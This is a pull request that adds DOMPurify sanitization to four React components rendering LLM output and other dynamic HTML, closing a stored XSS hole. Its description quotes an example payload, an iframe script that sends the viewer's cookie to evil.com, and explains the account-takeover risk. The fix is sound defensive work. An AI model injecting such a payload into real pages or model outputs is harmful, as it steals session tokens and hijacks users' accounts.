### PR TITLE
security: sanitize LLM output rendering to prevent stored XSS

### DIFF
--- a/web/components/layout/ChangelogModal.tsx
+++ b/web/components/layout/ChangelogModal.tsx
@@ -5,6 +5,7 @@ import {
   DialogTitle,
 } from "@/components/ui/dialog";
 import { ChangelogItem } from "./auth/types";
+import DOMPurify from "dompurify";
 
 const ChangelogModal = ({
   open,
@@ -36,7 +37,7 @@ const ChangelogModal = ({
             )}
             <div
               className="prose prose-sm dark:prose-invert prose-h2:text-base prose-h3:text-base"
-              dangerouslySetInnerHTML={{ __html: changelog["content:encoded"] }}
+              dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(changelog["content:encoded"]) }}
             />
           </div>
         </DialogContent>

--- a/web/components/shared/helicone/EmptyStateCard.tsx
+++ b/web/components/shared/helicone/EmptyStateCard.tsx
@@ -1,5 +1,6 @@
 import { Button } from "@/components/ui/button";
 import { H2, P } from "@/components/ui/typography";
+import DOMPurify from "dompurify";
 import {
   Archive,
   Bell,
@@ -311,7 +312,7 @@ const ShikiHighlightedCode: React.FC<{
     <div className="w-full overflow-hidden rounded-lg">
       <div
         className={`overflow-x-auto rounded-lg bg-[#24292e] p-4 text-left max-w-${maxWidth} mx-auto`}
-        dangerouslySetInnerHTML={{ __html: highlightedCode }}
+        dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(highlightedCode) }}
       />
     </div>
   );

--- a/web/components/shared/themed/demo/textbookCourse.tsx
+++ b/web/components/shared/themed/demo/textbookCourse.tsx
@@ -8,6 +8,7 @@ import "prismjs/components/prism-clike";
 import "prismjs/components/prism-javascript";
 import "prismjs/components/prism-json";
 import { Course } from "./types";
+import DOMPurify from "dompurify";
 import Link from "next/link";
 import { ChevronDownIcon, ChevronUpIcon } from "@heroicons/react/24/solid";
 import { SESSION_NAME } from "./courseGenerator";
@@ -74,7 +75,7 @@ const TextbookCourse: React.FC<TextbookCourseProps> = ({
     const html = marked.parse(content) as string;
     return (
       <div
-        dangerouslySetInnerHTML={{ __html: html }}
+        dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(html) }}
         className="prose prose-indigo max-w-none"
         style={{
           fontFamily: '"Fira Code", "Fira Mono", monospace',

--- a/web/components/templates/admin/adminSettings.tsx
+++ b/web/components/templates/admin/adminSettings.tsx
@@ -1,4 +1,5 @@
 import { useState, useMemo } from "react";
+import DOMPurify from "dompurify";
 import { $JAWN_API } from "../../../lib/clients/jawn";
 import { Button } from "@/components/ui/button";
 import { H1, P, Lead, Small } from "@/components/ui/typography";
@@ -400,7 +401,7 @@ const AdminSettings = () => {
                         <div className="flex items-center">
                           <p
                             className="font-sans m-0 text-base font-medium leading-7 text-[hsl(var(--foreground))]"
-                            dangerouslySetInnerHTML={{ __html: displayName }}
+                            dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(displayName) }}
                           />
                           {isSensitive && (
                             <span className="ml-2 rounded-full bg-amber-100 px-2 py-0.5 text-xs text-amber-800 dark:bg-amber-900 dark:text-amber-100">


### PR DESCRIPTION
## Summary

Sanitize all `dangerouslySetInnerHTML` usage with DOMPurify to prevent stored XSS attacks.

## Vulnerability

LLM outputs and other dynamic content rendered via `dangerouslySetInnerHTML` were not sanitized. An attacker could inject HTML/JS payloads (e.g., `<iframe srcdoc="<script>document.location='https://evil.com/?c='+document.cookie</script>">`) into LLM responses that would execute in the browser of anyone viewing the logs.

## Impact

Since Supabase session tokens do not have the `httpOnly` flag set, this enables **full account takeover** via cookie theft — any user viewing a poisoned log entry would have their session token exfiltrated.

## Fix

Applied `DOMPurify.sanitize()` to all remaining unsanitized `dangerouslySetInnerHTML` instances:

- **`ChangelogModal.tsx`** — RSS feed content rendering
- **`textbookCourse.tsx`** — `marked.parse()` markdown-to-HTML output  
- **`adminSettings.tsx`** — search highlight markup injection
- **`EmptyStateCard.tsx`** — Shiki code highlighting output

DOMPurify was already a dependency (used in `CodeHighlighter` and `ErrorMessage`). No new dependencies added.

## Note

The primary chat message rendering path uses Streamdown (react-markdown) with `rehype-harden`, which provides separate sanitization. This PR covers all the **non-Streamdown** rendering paths that were missing sanitization.